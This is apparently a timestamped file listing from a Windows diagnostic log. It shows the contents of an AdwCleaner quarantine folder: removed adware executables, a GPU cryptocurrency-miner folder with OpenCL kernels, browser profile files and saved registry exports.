         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -1.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -1.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -1.1s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -1.0s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.6s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.6s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.5s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.5s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.3s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.3s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.5s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.6s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.6s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.6s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.7s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.7s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.7s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.8s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.8s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.8s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.8s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          0.8s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          0.9s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          0.9s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          0.9s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          0.9s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.0s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.0s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.0s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.0s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.1s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.1s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.1s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.1s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.1s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.4s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          2.8s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
